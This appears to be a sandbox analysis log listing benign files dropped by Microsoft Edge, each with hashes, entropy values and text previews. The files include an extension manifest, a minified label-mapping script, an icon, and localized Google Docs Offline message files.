                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                  Malicious:false
